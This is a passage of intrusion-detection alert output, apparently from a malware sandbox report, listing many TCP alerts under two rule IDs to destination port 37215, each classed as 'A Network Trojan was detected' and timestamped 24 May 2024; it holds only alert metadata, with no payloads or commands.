              SID:2835222
              Source Port:48290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.442867
              SID:2829579
              Source Port:59542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231826
              SID:2829579
              Source Port:36024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574062
              SID:2835222
              Source Port:56942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639798
              SID:2835222
              Source Port:54600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.751572
              SID:2829579
              Source Port:57592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704171
              SID:2829579
              Source Port:47338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921205
              SID:2829579
              Source Port:52542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.978251
              SID:2835222
              Source Port:47324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545143
              SID:2829579
              Source Port:54544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663560
              SID:2829579
              Source Port:53864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197455
              SID:2829579
              Source Port:51244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202466
              SID:2835222
              Source Port:57478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606180
              SID:2829579
              Source Port:60960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573861
              SID:2835222
              Source Port:55078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.411747
              SID:2829579
              Source Port:53688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492186
              SID:2835222
              Source Port:50600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477832
              SID:2829579
              Source Port:49614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.830584
              SID:2829579
              Source Port:36076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448714
              SID:2829579
              Source Port:56892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164552
              SID:2835222
              Source Port:60564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578127
              SID:2835222
              Source Port:35052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542882
              SID:2835222
              Source Port:44962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574643
              SID:2835222
              Source Port:46236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.593806
              SID:2829579
              Source Port:49590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397186
              SID:2829579
              Source Port:42070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425466
              SID:2829579
              Source Port:37532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061799
              SID:2835222
              Source Port:41838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450953
              SID:2835222
              Source Port:43420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.881824
              SID:2835222
              Source Port:58054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186422
              SID:2829579
              Source Port:39652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802316
              SID:2835222
              Source Port:47476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.827869
              SID:2829579
              Source Port:46680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576524
              SID:2835222
              Source Port:38712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.290241
              SID:2835222
              Source Port:36496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358894
              SID:2829579
              Source Port:35272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987228
              SID:2829579
              Source Port:34470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103308
              SID:2829579
              Source Port:45672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705865
              SID:2829579
              Source Port:60470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420437
              SID:2835222
              Source Port:52348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.866374
              SID:2835222
              Source Port:37546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490894
              SID:2835222
              Source Port:41586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197977
              SID:2829579
              Source Port:35914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525302
              SID:2835222
              Source Port:47854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504735
              SID:2835222
              Source Port:46274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246412
              SID:2835222
              Source Port:45880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518867
              SID:2835222
              Source Port:38658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.299981
              SID:2829579
              Source Port:39554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099501
              SID:2829579
              Source Port:55678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150657
              SID:2829579
              Source Port:50950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448764
              SID:2835222
              Source Port:49542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149103
              SID:2835222
              Source Port:60010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105741
              SID:2835222
              Source Port:48446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702271
              SID:2835222
              Source Port:60002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.246337
              SID:2829579
              Source Port:43558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582601
              SID:2829579
              Source Port:49320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049852
              SID:2835222
              Source Port:60712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.798968
              SID:2835222
              Source Port:51782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309269
              SID:2829579
              Source Port:42196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235744
              SID:2835222
              Source Port:47526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445816
              SID:2835222
              Source Port:41650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.874009
              SID:2829579
              Source Port:60454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.340875
              SID:2829579
              Source Port:42580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663346
              SID:2829579
              Source Port:49420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705996
              SID:2835222
              Source Port:57918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453739
              SID:2835222
              Source Port:47696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150786
              SID:2829579
              Source Port:45484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924212
              SID:2829579
              Source Port:32774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801514
              SID:2829579
              Source Port:40960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.362313
              SID:2835222
              Source Port:53102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638243
              SID:2835222
              Source Port:55164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206405
              SID:2829579
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923967
              SID:2835222
              Source Port:45658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.064620
              SID:2835222
              Source Port:44528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123783
              SID:2829579
              Source Port:57304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725983
              SID:2835222
              Source Port:38328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574490
              SID:2829579
              Source Port:50688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.870421
              SID:2829579
              Source Port:50244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623868
              SID:2835222
              Source Port:41284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661263
              SID:2829579
              Source Port:49160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965558
              SID:2835222
              Source Port:49330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.881658
              SID:2829579
              Source Port:44956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153936
              SID:2829579
              Source Port:51158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.103610
              SID:2829579
              Source Port:43172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.972355
              SID:2829579
              Source Port:42110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.518584
              SID:2829579
              Source Port:48574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148818
              SID:2835222
              Source Port:58476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536384
              SID:2829579
              Source Port:53282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313295
              SID:2835222
              Source Port:45168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.148549
              SID:2829579
              Source Port:60278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642785
              SID:2835222
              Source Port:35098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441999
              SID:2835222
              Source Port:51870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.819596
              SID:2829579
              Source Port:48088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801847
              SID:2829579
              Source Port:45194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858964
              SID:2835222
              Source Port:40358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578035
              SID:2829579
              Source Port:45082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761858
              SID:2829579
              Source Port:48944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194042
              SID:2835222
              Source Port:53394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460525
              SID:2835222
              Source Port:58720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123461
              SID:2835222
              Source Port:36178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640199
              SID:2829579
              Source Port:47936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477271
              SID:2835222
              Source Port:60288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926611
              SID:2835222
              Source Port:45048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.060695
              SID:2835222
              Source Port:53862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546140
              SID:2835222
              Source Port:36284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059533
              SID:2829579
              Source Port:56232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.125142
              SID:2829579
              Source Port:55302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149013
              SID:2835222
              Source Port:33484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061445
              SID:2835222
              Source Port:57118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.125205
              SID:2829579
              Source Port:40052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517257
              SID:2829579
              Source Port:45080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.200656
              SID:2835222
              Source Port:50464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575404
              SID:2835222
              Source Port:42124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625245
              SID:2829579
              Source Port:42968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361526
              SID:2829579
              Source Port:33436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448816
              SID:2829579
              Source Port:37496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231807
              SID:2835222
              Source Port:59138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278039
              SID:2835222
              Source Port:59418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.677406
              SID:2835222
              Source Port:60558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360632
              SID:2835222
              Source Port:52256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542275
              SID:2829579
              Source Port:37248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203339
              SID:2835222
              Source Port:37154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.751965
              SID:2835222
              Source Port:44914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375063
              SID:2829579
              Source Port:42742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872009
              SID:2829579
              Source Port:51274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.235712
              SID:2835222
              Source Port:33400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.547423
              SID:2835222
              Source Port:46114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433354
              SID:2835222
              Source Port:53910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638481
              SID:2829579
              Source Port:47790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432280
              SID:2829579
              Source Port:47032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055584
              SID:2835222
              Source Port:50620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485010
              SID:2835222
              Source Port:35962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368741
              SID:2835222
              Source Port:45088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.822913
              SID:2835222
              Source Port:34602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.542350
              SID:2835222
              Source Port:33808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053326
              SID:2829579
              Source Port:36828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.165578
              SID:2829579
              Source Port:60642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.208272
              SID:2835222
              Source Port:35236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727350
              SID:2835222
              Source Port:56160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.766425
              SID:2829579
              Source Port:50110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.441921
              SID:2835222
              Source Port:42932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117331
              SID:2829579
              Source Port:42656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485280
              SID:2829579
              Source Port:38460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362327
              SID:2835222
              Source Port:34314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.820776
              SID:2835222
              Source Port:50990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.831454
              SID:2835222
              Source Port:59658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197935
              SID:2829579
              Source Port:53916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.424242
              SID:2835222
              Source Port:41330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485124
              SID:2835222
              Source Port:40348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505514
              SID:2829579
              Source Port:58260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599212
              SID:2829579
              Source Port:52290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.074233
              SID:2829579
              Source Port:54716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918433
              SID:2835222
              Source Port:39950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063360
              SID:2829579
              Source Port:57132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685200
              SID:2835222
              Source Port:36866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.267785
              SID:2835222
              Source Port:37122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264764
              SID:2835222
              Source Port:49374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.828512
              SID:2829579
              Source Port:35970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536258
              SID:2835222
              Source Port:47994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.120818
              SID:2829579
              Source Port:36028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756137
              SID:2835222
              Source Port:38794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573471
              SID:2829579
              Source Port:60744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482600
              SID:2829579
              Source Port:36704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581698
              SID:2835222
              Source Port:35436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.365271
              SID:2835222
              Source Port:34030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.531888
              SID:2829579
              Source Port:49968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268594
              SID:2829579
              Source Port:51246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245181
              SID:2835222
              Source Port:49660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504483
              SID:2829579
              Source Port:54832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727362
              SID:2835222
              Source Port:46294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502011
              SID:2829579
              Source Port:56820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341181
              SID:2835222
              Source Port:43180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459889
              SID:2835222
              Source Port:54620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988436
              SID:2829579
              Source Port:56326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457796
              SID:2835222
              Source Port:39190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.198727
              SID:2835222
              Source Port:34190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116617
              SID:2829579
              Source Port:49592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928774
              SID:2829579
              Source Port:44136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573427
              SID:2829579
              Source Port:59864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.981048
              SID:2829579
              Source Port:34850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.265845
              SID:2835222
              Source Port:37512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799242
              SID:2835222
              Source Port:39376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.867947
              SID:2829579
              Source Port:46264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.068955
              SID:2835222
              Source Port:44826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530946
              SID:2829579
              Source Port:48402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882814
              SID:2829579
              Source Port:41002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.203306
              SID:2829579
              Source Port:41434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.462967
              SID:2829579
              Source Port:49544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579498
              SID:2829579
              Source Port:48266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.693165
              SID:2835222
              Source Port:45800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873901
              SID:2835222
              Source Port:40496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624403
              SID:2829579
              Source Port:46136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553716
              SID:2835222
              Source Port:57340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797686
              SID:2835222
              Source Port:46672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517944
              SID:2835222
              Source Port:41788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202846
              SID:2835222
              Source Port:54592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548631
              SID:2829579
              Source Port:40878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397784
              SID:2835222
              Source Port:49186
              Destination Port:37215
